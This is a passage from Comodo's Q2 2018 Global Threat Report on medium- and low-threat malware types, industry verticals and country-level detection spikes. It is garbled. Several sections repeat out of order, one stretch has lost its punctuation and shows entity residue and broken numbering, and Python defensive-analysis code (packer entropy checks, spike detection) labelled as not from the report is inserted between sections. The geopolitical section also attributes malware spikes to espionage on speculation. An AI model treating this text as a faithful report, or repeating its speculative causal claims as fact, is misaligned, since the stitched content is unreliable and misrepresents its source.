7.10 Finland, Russia, USA

Finally, let's have a look at Comodo's virus detections in Finland during Q2 2018. The largest single spike, by far, occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki. Geolocation of this virus activity in Finland revealed that it almost exclusively took place in Helsinki's suburb of Vantaa, precisely where the summit was scheduled to take place.

8 Conclusions

In Q2, Comodo Cybersecurity observed several new significant trends likely to radically influence the cybersecurity marketplace and IT end users. These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios.

The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon. Trojans are a covert weapon, and the cybersecurity industry should assume that many trojan-based attacks that occurred in Q2 remain undetected, with the real impact of these attacks being revealed in quarters to come. Another meaningful fact is that trojans serve as a delivery vector for other types of malware. Combined, these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples.

Our findings show that malware is becoming more cunning in delivery method, more sophisticated in persistence and much harder to detect by antivirus software. Propagation of fileless malware, the evolution of cryptominers and the use of legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication.

Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems, presaging new attacks and mobile malware development. As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures), cybercriminals can anticipate rich pickings from exploiting those devices. With successful penetration, perpetrators profit by stealing money, selling confidential information or blackmailing victims.

Moreover, given that the majority of detected trojans in Q2 were information stealers, we can see another dangerous tendency: the accelerating bias of cybercriminals toward hunting for confidential data.

Combined, these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future, creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy, policies and postures.


About Comodo Cybersecurity

Comodo Threat Research Labs monitors, filters and analyzes malware, ransomware, viruses and other "unknown" potentially dangerous files 24/7/365 in over 190 countries around the world. With 5 offices spread across the Americas, Asia and Europe (and staff covering over 190 countries), the Lab is made up of more than 220 IT security professionals, ethical hackers, computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing millions of potential pieces of malware, phishing, spam or other malicious/unwanted files and emails every day.

The Lab also works with trusted partners in academia, government and industry to gain additional insights into known and potential threats. CTRL's mission is to use the best combination of cybersecurity technology and innovations, machine learning-powered analytics, artificial intelligence and human experts and insights to secure and protect Comodo Cybersecurity customers, business and public-sector partners and the public community.

Comodo Cybersecurity is a global innovator of cybersecurity solutions, protecting critical information across the digital landscape. Building on its unique position as the world's largest certificate authority, Comodo Cybersecurity authenticates, validates and secures networks and infrastructures from individuals to mid-sized companies to the world's largest enterprises. Comodo Cybersecurity provides complete end-to-end security solutions across the boundary, internal network and endpoint with innovative technologies solving the most advanced malware threats, both known and unknown. With global headquarters in Clifton, New Jersey, and branch offices in Silicon Valley, Comodo Cybersecurity has international offices in China, India, the Philippines, Romania, Turkey, Ukraine and the United Kingdom. For more information visit comodo.com. Comodo Cybersecurity and the Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc. or its affiliates in the US and other countries. Other names may be trademarks of their respective owners. The current list of Comodo Cybersecurity trademarks and patents is available at comodo.com/repository.

5.2.4 Exploits

Computer exploits comprise software, data chunks or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware. Exploits can enable unauthorized access, privilege escalation or denial-of-service (DoS).

The discovery of computer exploits can be rare, as such vulnerabilities are typically patched and fixed quickly once they are discovered.

In Q2 2018 the majority of exploits detected by Comodo were focused on taking advantage of a favorite hacker target: Adobe Portable Document Format (PDF) files, which were created in the 1990s to present documents in a common format independent of application software, hardware and operating systems.

Japan and India were the two countries where Comodo detected the majority of exploit behavior in Q2 2018, with Japan clearly experiencing the most persistent challenges.

5.3 Medium Threat Malware

In this section we will focus on five malware types that are somewhat rarer and more exotic. These include Email Flooders, Constructors, Jokes, Virtual Tools and Malware Packers.

5.3.1 Constructor

Constructors are applications that can be used to automatically create malware files.

For Q2, Alamar was the #1 constructor that Comodo detected. Microsoft describes this program as a "Severe" malware threat to PC users.

In Q2, Germany (de) was the top country of detection for Constructors.

And this timeline shows not only that Germany had a serious problem with Constructors in Q2, but also that the malware is likely a persistent threat to German networks.

5.3.2 Packers

Malware that is "packed" refers to any means used to hide or obfuscate malicious executable code by compressing or "packing" it within larger, seemingly innocuous software and data streams. The hostile code can even come in the form of scripts. The compressed data often contains separate decompression code, or even a self-extracting archive, which is used to recreate the original code from the compressed code and then execute the malware. Encryption may also be used to conceal the malware from security software, as another means to obfuscate the attack.

MUPX, or the Modified "Ultimate Packer for Executables", dominated this part of the malware landscape. MUPX is free, open source software that is compatible with numerous file formats and different operating systems and leverages an open source data compression algorithm, UCL, that is just a few hundred bytes of code in length.

In Q2 2018 Russia was the #1 home to malware Packers.

This timeline shows that Russia had the most persistent Packer problems, while Iran had the highest periodic spikes.
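As an added example (not code from the Comodo report), the Python script below shows the defender-side triage check a packer like MUPX invites: it parses a PE section table and flags known UPX section names, a section that is empty on disk but large in memory (the unpack target), and raw section data whose entropy looks compressed or encrypted. The two sample PE images are constructed inline and are not real programs; the 7.0 bits/byte and 256-byte thresholds are assumptions chosen for illustration.

```python
import math
import random
import struct
from typing import Dict, List

# Added example, not code from the Comodo report. The PE images below are
# constructed inline; the entropy and size thresholds are assumed values.

SECTION_HDR = "<8sIIIIIIHHI"        # IMAGE_SECTION_HEADER layout, 40 bytes
PACKER_SECTION_NAMES = {"UPX0", "UPX1", "UPX2"}
HIGH_ENTROPY = 7.0                  # bits per byte; assumed threshold for packed data
MIN_RAW_FOR_ENTROPY = 256           # below this, an entropy estimate is not meaningful


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte: 0.0 for empty input, at most 8.0."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def parse_sections(image: bytes) -> List[Dict]:
    """Walk DOS header -> PE signature -> COFF header -> section table."""
    if image[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    num_sections = struct.unpack_from("<H", image, coff + 2)[0]
    size_of_optional = struct.unpack_from("<H", image, coff + 16)[0]
    table = coff + 20 + size_of_optional
    sections = []
    for i in range(num_sections):
        name, vsize, _vaddr, rsize, rptr, *_ = struct.unpack_from(SECTION_HDR, image, table + 40 * i)
        raw = image[rptr:rptr + rsize] if rsize else b""
        sections.append({
            "name": name.rstrip(b"\0").decode("ascii", "replace"),
            "virtual_size": vsize,
            "raw_size": rsize,
            "entropy": shannon_entropy(raw),
        })
    return sections


def packer_indicators(image: bytes) -> List[str]:
    """Return human-readable packing indicators; an empty list means none were seen."""
    indicators = []
    for s in parse_sections(image):
        if s["name"] in PACKER_SECTION_NAMES:
            indicators.append(f"{s['name']}: known packer section name")
        if s["raw_size"] == 0 and s["virtual_size"] > 0:
            # Empty on disk but large in memory: where the stub writes the unpacked code.
            indicators.append(f"{s['name']}: unpack target ({s['virtual_size']} bytes virtual, 0 raw)")
        if s["raw_size"] >= MIN_RAW_FOR_ENTROPY and s["entropy"] > HIGH_ENTROPY:
            indicators.append(f"{s['name']}: high entropy {s['entropy']:.2f} (compressed or encrypted)")
    return indicators


def build_sample_pe(packed: bool) -> bytes:
    """Constructed minimal PE32 image (headers plus two sections); not a runnable program."""
    size_of_optional, raw_ptr = 224, 0x400
    if packed:
        # UPX layout: UPX0 is the empty unpack target, UPX1 holds the compressed payload.
        rng = random.Random(1)                      # deterministic stand-in for UCL output
        payload = bytes(rng.getrandbits(8) for _ in range(2048))
        layout = [("UPX0", 0x10000, 0x1000, 0, 0),
                  ("UPX1", len(payload), 0x11000, len(payload), raw_ptr)]
    else:
        payload = b"mov eax, ebx\n" * 160           # low-entropy stand-in for ordinary code
        layout = [(".text", len(payload), 0x1000, len(payload), raw_ptr),
                  (".data", 64, 0x2000, 64, raw_ptr + len(payload))]
        payload += b"\0" * 64
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 64)                       # e_lfanew = 64
    coff = struct.pack("<HHIIIHH", 0x14C, len(layout), 0, 0, 0, size_of_optional, 0x0102)
    optional = struct.pack("<H", 0x10B) + b"\0" * (size_of_optional - 2)   # PE32 magic, rest zero
    table = b"".join(struct.pack(SECTION_HDR, n.encode().ljust(8, b"\0"), vs, va, rs, rp,
                                 0, 0, 0, 0, 0x60000020) for n, vs, va, rs, rp in layout)
    headers = dos + b"PE\0\0" + coff + optional + table
    return headers.ljust(raw_ptr, b"\0") + payload


if __name__ == "__main__":
    for label, image in (("packed", build_sample_pe(True)), ("benign", build_sample_pe(False))):
        print(label, packer_indicators(image) or ["no packer indicators"])
    # A modified UPX may rename its sections; the size and entropy checks still fire.
    packed = build_sample_pe(True)
    renamed = packed[:0x400].replace(b"UPX0", b".bss").replace(b"UPX1", b"CODE") + packed[0x400:]
    print("renamed", packer_indicators(renamed))
```

Because a modified UPX can rename its sections, the unpack-target and entropy checks are the ones that survive; on real files run the same checks over the whole section table rather than trusting names alone.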

5.3.3 Email Flooder

Email Flooders are malware used to overwhelm an email server with messages in order to "kill" it or shut it down, in a form of denial-of-service (DoS) attack.

The one Email Flooder that Comodo detected in Q2 2018 was Palevo, which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders.

The primary country where Comodo detected this malicious behavior was Germany.

And this timeline shows that, while the number of Palevo detections was not high, it was still a persistent threat in Germany.

5.3.4 Virtual Tools

Virtual Tools are programs that can modify or alter malicious files to avoid detection.

The top Virtual Tools that Comodo detected in Q2 2018 were Patcher, AntiAV and RunFile.

The top two countries for Virtual Tools detections were Germany and the US.

This timeline shows that Germany had one particularly heavy infestation around the beginning of June, while the US had two sharp spikes, one at the start and the other at the end of Q2 2018.

5.3.5 Jokes

"Joke" malware is in fact just what it says: these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor, or simply to annoy the user for a brief period of time.

Such malware is typically only labeled a "Medium" threat because the hacker's intention is not to damage or destroy information but merely to have fun at the victim's expense.

Germany (de) and the US were the top two countries of detection for Joke malware.

In this timeline you can see that this malware type is not numerous, but still something to be aware of.

5.4 Low Threat Malware: Applications

In this section we will cover a range of malicious functionality that Comodo detected within Applications, Unwanted Applications and Unsafe Applications.

Global Threat Report Q2 2018 Edition

Page 58 of 73

541 Applications Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose However Comodo detects and flags such applications as malicious because they to exhibit behavior that of which users may be unaware including extreme efforts to track user behavior and location

In Q2 2018 the most common such application was Elex Despite the fact that Microsoft has labeled Elex only as ldquoPotentially Unwanted Applicationrdquo or PUA this software is nasty and attempts to install files that run at startup add drivers inject processes alter browser behavior and modify DNS settings

The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications

And finally this timeline shows that far from being a rare occurrence such malicious software is endemic especially in North America

Global Threat Report Q2 2018 Edition

Page 59 of 73

542 Unwanted Applications The unwanted application malware category is alarming in that during the course of common computer and Internet activity users often inadvertently install these Applications For example they include common adware programs widely disseminated images videos dialers jokes gossip and more

The most common unwanted application that Comodo detected this quarter was DealPly which Microsoft describes as ldquopoor reputationrdquo software that tries to install additional bundled software modify the user homepage modify search provider andor perform other actions users might not have intended They include free toolbars adware and ldquosystem optimizersrdquo

As you can see in the bubble chart the US is far and away the most common country of detection for unwanted applications in Q2 2018

And as this timeline shows this malware type poses not only a large but also a daily challenge to network security in the US

Global Threat Report Q2 2018 Edition

Page 60 of 73

543 Unsafe Applications Unsafe applications are seemingly legitimate programs but in fact are frequently leveraged by coders and hackers with malicious intent Often they claim to help users with administrative or security functionality but in fact do the opposite and include fake anti-virus and free Internet Relay Chat (IRC) clients

The most common unsafe application that Comodo detected in Q2 2108 was AutoKMS software that can be used to ldquocrackrdquo or patch unregistered copies of Microsoft software These are referred to as ldquohacktoolsrdquo and may be distributed with additional malware that users can install inadvertently

This malware type is a bit different in that while the US is currently the most common country of detection Ukraine (ua) and Russia (ru) are 2 and 3 respectively

This timeline shows that the US ndash and to a lesser extent Ukraine ndash have a steady problem with Unsafe Applications while Russia experienced one major spike in Q2 2018

Global Threat Report Q2 2018 Edition

Page 61 of 73

6 Vertical analysis In this section letrsquos examine unique malware profiles that Comodo identified within specific ldquoverticalsrdquo or economic sectors The infographic details unique malware distributions for twenty-two vertical markets or industries from automotive to travel covering four dangerous malware types Backdoors Trojans Viruses and Worms Further the diagram lists the 1 malware family for each Verticalrsquos top malware type

Letrsquos take a closer look at two trojans Kryptik and Zbot that were the top detected in not only one but within multiple verticals clearly making them a current strategic threat across the world

Global Threat Report Q2 2018 Edition

Page 62 of 73

First Kryptik the New Jersey Cybersecurity amp Communications Integration Cell reported that Kryptik was first created to obtain information about an infected hostrsquos FTP servers but now has the ability to target email clients file browsers and file managers CNET Magazine wrote that Kryptik has been used as a trojan ldquoClickerrdquo to boost the hit-count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017

Second letrsquos examine ldquoZbotrdquo which is another name for the ldquoZeusrdquo Trojan undermining Microsoft Windows security since 2007 One of its first uses was to target the United States Department of Transportation And over a decade later Zbot is still the top Trojan in government and transportation verticals Today the Zeus botnet may be the largest on the Internet with millions of compromised machines around the world

Zeus has often been used to steal financial information such as account numbers and passwords via keystroke logging and online form grabbing It has also been used to install ransomware including CryptoLocker Zbot is often spread through drive-by downloads and email phishing attacks sometimes supported by a social engineering scheme that falsely claims that a targetrsquos computer already has a Virus and needs to be cleaned

In conclusion trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks Second strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies primary malware threats and better focuses limited time and resources against them

Global Threat Report Q2 2018 Edition

Page 63 of 73

7 Geopolitical Intelligence

71 USA This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018 Clearly the major spike on March 13 stands out in this data What happened on this day in the US and what might help to explain the surge in malware activity On that day US President Donald Trump announced the names of his new Secretary of State Mike Pompeo and new CIA Director Gina Haspel In that light one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements comprising many requests for information related to upcoming changes in US political military and intelligence activities After which these agencies immediately began to fulfill these requirements via computer hacking ndash commonly called cyber espionage ndash which today takes place on a far greater scale than the public realizes

Global Threat Report Q2 2018 Edition

Page 64 of 73

72 China This chart illustrates Comodorsquos aggregated malware detections in China for Q2 2018 Clearly June 4 stands out as the single most prominent day The reason for this massive spike is that many intelligence services ndash both foreign and domestic ndash were likely busy trying to protect andor collect sensitive information relating to current events within China Why on June 4 That is the anniversary of the 1989 Tiananmen Square protests

Global Threat Report Q2 2018 Edition

Page 65 of 73

73 South Korea

National security events always attract the attention of professional hackers who seek to collect the kind of information as the basis for intelligence reporting This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018 The highest single spikes took place simultaneous to annual joint US-South Korean military exercises This fact should come as little surprise in the Internet age when everyone from students to soldiers spies and statesmen does most of their work online Students collect data for academic papers spies collect data for intelligence reports


7.4 North Korea

The chart above shows Comodo malware detections in North Korea during Q2 2018. At the beginning of May, Comodo saw a spike consisting of well over ten times the usual number of detections. One plausible explanation for this activity is that someone, or some institution, was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world. Comodo did further research on the detected malware and identified it as Windows activation or "cracking" software and Chinese-made anti-censorship programs.


7.5 Armenia

All major geopolitical events today are bathed in malware. The reason is that all activities, from social activities to business, politics or national security affairs, are mostly performed online. This is especially true during times of national crisis, as both government and citizens are in overdrive trying to gather new information, or trying to prevent others from doing the same. Ample evidence is provided by this timeline, which shows that Armenia's 2018 political revolution was accompanied by Comodo's largest detection of malware within that country during Q2 2018.


7.6 Belarus

A common hacker refrain is that "information wants to be free." Evidence for this argument is provided by this timeline, which shows Comodo's virus and trojan detections in Belarus in Q2 2018. On June 14, as the government in Minsk passed new legislation with a view toward controlling the spread of "fake news," Comodo detected a massive spike in both viruses and trojans. It is possible that the virus outbreak was specifically used to disseminate trojan horses, which were then leveraged for some real-world purpose: either to gather, deny or manipulate sensitive information related to the new legislation and its impact on Belarusian society.


7.7 Iraq

Today there is possibly no hotter topic in information security than election hacking. In this chart, showing Comodo malware detections in Iraq in Q2 2018, two clear spikes stand out that we must consider. Both might be associated with recent electoral incidents. In mid-April, Iraq was preparing for a national election, which included a conundrum on how best to secure its electronic dimension. And at the beginning of July, Iraq was preparing for a vote recount following accusations of impropriety at the polls.


7.8 Ukraine

Sometimes it is hard to know the reason for a specific spike in malware detection, and sometimes there may be multiple reasons. In this timeline of Comodo malware detections in Ukraine in Q2 2018, there may have been multiple reasons for the highest spike, on May 24. Both of the cited news stories are from May 23: the first discusses Ukraine's Independence Day as well as Ukraine's testing of new military weapons provided by the US government; the second describes a cyberattack that Ukraine feared would target a major sporting event, the Champions League final in Ukraine's capital city, Kyiv, on May 26.


7.9 Croatia

Since the cyberattack that targeted Estonia in 2007, it has been clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations. In that context, this massive spike in malware detection in Croatia on March 28 is interesting, as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an "act of hostility."


7.10 Finland, Russia, USA

Finally, let's have a look at Comodo's virus detections in Finland during Q2 2018. The largest single spike, by far, occurred on the day when the press began to report that Donald Trump and Vladimir Putin would hold a summit in the Finnish capital of Helsinki. Geolocation of this virus activity in Finland revealed that it almost exclusively took place in Vantaa, a suburb of Helsinki, and precisely where the summit was scheduled to take place.
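The spikes called out in sections 7.1 through 7.10 are picked out by eye from the timelines. As an added example (not code from the report, and not run on Comodo's data), the following shows one objective way to do the same on a daily detection count: a robust z-score built from the median and the median absolute deviation (MAD), which, unlike the mean and standard deviation, the spikes themselves cannot inflate. The 91-day timeline, its weekday/weekend pattern, the two injected spike days and the threshold of 5 are all constructed assumptions for illustration.

```python
"""Robust spike detection for a daily malware-detection timeline.

Added example, not report code. A day is flagged when its count sits far
above the typical level, measured with the median and the median absolute
deviation (MAD) so that the spikes do not distort their own baseline.
"""
from datetime import date, timedelta
from statistics import median
from typing import Dict, List, Tuple

MAD_SCALE = 0.6745  # scales MAD to a standard-deviation equivalent for normal data


def robust_spikes(series: Dict[date, int], threshold: float = 5.0) -> List[Tuple[str, int, float]]:
    """Return (iso_day, count, score) for every day whose robust z-score >= threshold."""
    counts = list(series.values())
    med = median(counts)
    mad = median(abs(c - med) for c in counts)
    if mad == 0:
        mad = 1.0  # flat series: avoid dividing by zero (assumption: treat deviations literally)
    flagged = []
    for day in sorted(series):
        score = MAD_SCALE * (series[day] - med) / mad
        if score >= threshold:
            flagged.append((day.isoformat(), series[day], round(score, 2)))
    return flagged


def constructed_timeline() -> Dict[date, int]:
    """Constructed sample (not Comodo data): Q2 2018 with a noisy weekday
    baseline, a weekend dip, and two injected spikes."""
    start = date(2018, 4, 1)
    series: Dict[date, int] = {}
    for i in range(91):                      # April 1 .. June 30
        day = start + timedelta(days=i)
        count = 100 + (i * 37) % 23          # deterministic jitter, 0..22
        if day.weekday() >= 5:
            count -= 30                      # weekend dip
        series[day] = count
    series[date(2018, 5, 24)] = 900          # injected spike
    series[date(2018, 6, 4)] = 1500          # injected spike
    return series


def detect_constructed() -> List[Tuple[str, int, float]]:
    """Run the detector over the constructed timeline."""
    return robust_spikes(constructed_timeline())


if __name__ == "__main__":
    for iso_day, count, score in detect_constructed():
        print(f"{iso_day}: {count} detections (robust z = {score})")
```

The weekend dip is why a mean-based threshold would misbehave on real telemetry: the mean is pulled down by low days and up by the spikes, whereas the median stays at the weekday level, so only the two injected days are reported. Attributing a flagged day to a news event, as the report does, remains a separate analytical step.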


8 Conclusions

In Q2, Comodo Cybersecurity observed several new, significant trends likely to radically influence the cybersecurity marketplace and IT end users. These trends not only demonstrate an upswing in malware across the world but also presage possible future cybersecurity scenarios.

The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon. Trojans are a covert weapon, and the cybersecurity industry should assume that many trojan-based attacks that occurred in Q2 remain undetected, with the real impact of these attacks being revealed in quarters to come. Another meaningful fact is that trojans serve as a delivery vector for other types of malware. Combined, these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples.

Our findings show that malware is becoming more cunning in delivery method, more sophisticated in persistence, and much harder for antivirus software to detect. The propagation of fileless malware, the evolution of cryptominers, and the use of legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication.

Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems, presaging new attacks and mobile malware development. As more people use their mobile devices for financial transactions (via banking and e-payment apps) and to store confidential information (like messenger correspondence and private pictures), cybercriminals can anticipate rich pickings from exploiting those devices. After a successful penetration, perpetrators profit by stealing money, selling confidential information or blackmailing victims.

Moreover, given that the majority of detected trojans in Q2 were information stealers, we can see another dangerous tendency: cybercriminals' accelerating bias toward hunting for confidential data.

Combined, these trends promise a heavy impact on the cybersecurity marketplace and on IT end users in the future, creating changes in the cybersecurity landscape and forcing IT security departments to update their security measures and probably revamp their security strategy, policies and postures.

REQUEST A DEMO: Try Comodo Cybersecurity by speaking with a security consultant to begin the process to set up a demo or proof-of-concept project. Contact us directly at +1 888-266-6361.

© 2018 ALL RIGHTS RESERVED. COMODO SECURITY SOLUTIONS, INC. VISIT COMODO.COM

NORTH AMERICA: Comodo Security Solutions, Inc., 1255 Broad Street, Clifton, NJ 07013, United States. Tel: +1 (888) 551 1531; Tel: +1 (888) 266 6361; Int: +1 (703) 581 6361; Fax: +1 (973) 777 4394; sales@comodo.com

EUROPE: Comodo Security Solutions, Inc., Șoseaua Națională 31, Iași 700237, Romania. Tel: +40 332 806 772

ASIA: Comodo Security Solutions Pvt. Ltd., Prestige Office Centre, 183 NSK Salai, Vadapalani, Chennai, India. Tel: +91 44 4562 2800; www.comodo.co.in

Comodo Threat Research Labs monitors, filters and analyzes malware, ransomware, viruses and other "unknown," potentially dangerous files 24/7/365 in over 190 countries around the world. With 5 offices spread across the Americas, Asia and Europe (and staff covering over 190 countries), the Lab is made up of more than 220 IT security professionals, ethical hackers, computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing millions of potential pieces of malware, phishing, spam or other malicious/unwanted files and emails every day. The Lab also works with trusted partners in academia, government and industry to gain additional insights into known and potential threats. CTRL's mission is to use the best combination of cybersecurity technology and innovations, machine learning-powered analytics, artificial intelligence, and human experts and insights to secure and protect Comodo Cybersecurity customers, business and public-sector partners, and the public community.

About Comodo Cybersecurity

Comodo Cybersecurity is a global innovator of cybersecurity solutions, protecting critical information across the digital landscape. Building on its unique position as the world's largest certificate authority, Comodo Cybersecurity authenticates, validates and secures networks and infrastructures, from individuals to mid-sized companies to the world's largest enterprises. Comodo Cybersecurity provides complete end-to-end security solutions across the boundary, internal network and endpoint, with innovative technologies solving the most advanced malware threats, both known and unknown. With global headquarters in Clifton, New Jersey and branch offices in Silicon Valley, Comodo Cybersecurity has international offices in China, India, the Philippines, Romania, Turkey, Ukraine and the United Kingdom. For more information, visit comodo.com. Comodo Cybersecurity and the Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group, Inc. or its affiliates in the US and other countries. Other names may be trademarks of their respective owners. The current list of Comodo Cybersecurity trademarks and patents is available at comodo.com/repository.



5.3 Medium Threat Malware

In this section we will focus on five malware types that are somewhat rarer and more exotic. These include Email Flooders, Constructors, Jokes, Virtual Tools and Malware Packers.


5.3.1 Constructor

Constructors are applications that can be used to automatically create malware files.

For Q2, Alamar was the #1 constructor that Comodo detected. Microsoft describes this program as a "Severe" malware threat to PC users.

In Q2, Germany (de) was the top country of detection for Constructors.

And this timeline shows not only that Germany had a serious problem with Constructors in Q2, but also that the malware is likely a persistent threat to German networks.


5.3.2 Packers

Malware that is "packed" refers to any means used to hide or obfuscate malicious executable code by compressing or "packing" it within larger, seemingly innocuous software and data streams. The hostile code can even come in the form of scripts. The compressed data often contains separate decompression code, or even a self-extracting archive, which is used to recreate the original code from the compressed code and then execute the malware. Encryption may also be used to conceal the malware from security software, as another means to obfuscate the attack.

MUPX, or the Modified "Ultimate Packer for Executables," dominated this part of the malware landscape. MUPX is free, open source software that is compatible with numerous file formats and different operating systems, and it leverages an open source data compression algorithm, UCL, that is just a few hundred bytes of code in length.

In Q2 2018, Russia was the #1 home to malware Packers.

This timeline shows that Russia had the most persistent Packer problems, while Iran had the highest periodic spikes.
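Because compressed or encrypted code leaves statistical fingerprints, a defender can triage a sample for packing before any signature matches. The following is an added example (not code from the report or from any Comodo product) that parses the section table of a PE file and scores each section's byte entropy; a packed or encrypted section sits near the 8-bit maximum, while ordinary code and data sit well below it. The minimal sample image, the section names `.text` and `UPX1`, and the 7.0-bit threshold are constructed assumptions for illustration; a section-name check alone would be weak, since packers can rename sections, which is why the entropy score is the primary signal here.

```python
"""Entropy-based packer heuristic for PE files (added example, not report code).

Packed or encrypted sections compress poorly, so their Shannon entropy sits
close to the 8-bit maximum; ordinary x86 code and plain data sit well below.
"""
import hashlib
import math
import struct
from typing import List, Tuple

# Rule-of-thumb cut-off in bits per byte; tune it on your own corpus (assumption).
PACKED_ENTROPY_THRESHOLD = 7.0


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte: 0.0 for empty or constant input, 8.0 at most."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def pe_sections(image: bytes) -> List[Tuple[str, bytes]]:
    """Return (name, raw_bytes) per section of a PE image.

    Minimal parser: DOS header -> e_lfanew -> "PE\\0\\0" -> COFF header -> section table.
    """
    if image[:2] != b"MZ":
        raise ValueError("not a DOS/PE image")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    num_sections = struct.unpack_from("<H", image, coff + 2)[0]
    size_of_optional = struct.unpack_from("<H", image, coff + 16)[0]
    table = coff + 20 + size_of_optional          # COFF header is 20 bytes
    sections = []
    for i in range(num_sections):                  # each section header is 40 bytes
        name, _vsize, _vaddr, raw_size, raw_ptr = struct.unpack_from("<8sIIII", image, table + 40 * i)
        if raw_ptr + raw_size > len(image):
            raise ValueError("section raw data runs past end of file")
        sections.append((name.rstrip(b"\0").decode("ascii", "replace"), image[raw_ptr:raw_ptr + raw_size]))
    return sections


def scan_pe(image: bytes, threshold: float = PACKED_ENTROPY_THRESHOLD) -> List[Tuple[str, float, bool]]:
    """Return (section_name, entropy, suspicious) for every section."""
    results = []
    for name, raw in pe_sections(image):
        ent = shannon_entropy(raw)
        results.append((name, round(ent, 3), ent >= threshold))
    return results


def build_sample_pe(payloads: List[Tuple[str, bytes]]) -> bytes:
    """Construct a minimal PE image carrying the given sections.

    Only the fields the parser reads are meaningful; this is a constructed
    test artefact, not a loadable executable.
    """
    e_lfanew = 0x40
    dos_header = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    table_off = e_lfanew + 4 + 20
    data_off = table_off + 40 * len(payloads)
    coff = struct.pack("<HHIIIHH", 0x14C, len(payloads), 0, 0, 0, 0, 0)  # no optional header
    headers, body = b"", b""
    for name, payload in payloads:
        raw_ptr = data_off + len(body)
        headers += struct.pack("<8sIIIIIIHHI", name.encode("ascii")[:8].ljust(8, b"\0"),
                               len(payload), 0x1000, len(payload), raw_ptr, 0, 0, 0, 0, 0)
        body += payload
    return dos_header + b"PE\0\0" + coff + headers + body


# Constructed sample: a plain code/data section and a high-entropy "packed" one.
PLAIN_SECTION = b"Ordinary program text: strings, tables and code.\n" * 64
PACKED_SECTION = b"".join(hashlib.sha256(i.to_bytes(4, "little")).digest() for i in range(128))
SAMPLE_IMAGE = build_sample_pe([(".text", PLAIN_SECTION), ("UPX1", PACKED_SECTION)])


def scan_sample() -> List[Tuple[str, float, bool]]:
    """Score the constructed sample image."""
    return scan_pe(SAMPLE_IMAGE)


if __name__ == "__main__":
    for name, ent, suspicious in scan_sample():
        print(f"{name:8s} entropy={ent:.3f} {'likely packed/encrypted' if suspicious else 'ok'}")
```

On a real binary the same scan runs over the file bytes read from disk; high entropy is a triage signal, not proof of malice, since legitimate installers and media resources also compress well, so the score is best combined with other indicators such as a tiny import table or an entry point outside `.text`.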


5.3.3 Email Flooder

Email Flooders are malware used to overwhelm email servers with messages in order to "kill" or shut them down, in a form of denial-of-service (DoS) attack.

The one Email Flooder that Comodo detected in Q2 2018 was Palevo, which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders.

The primary country where Comodo detected this malicious behavior was Germany.

And this timeline shows that, while the number of Palevo detections was not high, it was still a persistent threat in Germany.


5.3.4 Virtual Tools

Virtual Tools are programs that can modify or alter malicious files to avoid detection.

The top Virtual Tools that Comodo detected in Q2 2018 were Patcher, AntiAV and RunFile.

The top two countries for Virtual Tools detections were Germany and the US.

This timeline shows that Germany had one particularly heavy infestation around the beginning of June, while the US had two sharp spikes, one at the start and the other at the end of Q2 2018.


5.3.5 Jokes

"Joke" malware is in fact just what it says: these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor, or simply to annoy the user for a brief period of time.

Such malware is typically only labeled a "Medium" threat because the hacker's intention is not to damage or destroy information but merely to have fun at the victim's expense.

Germany (de) and the US were the top two countries of detection for Joke malware.

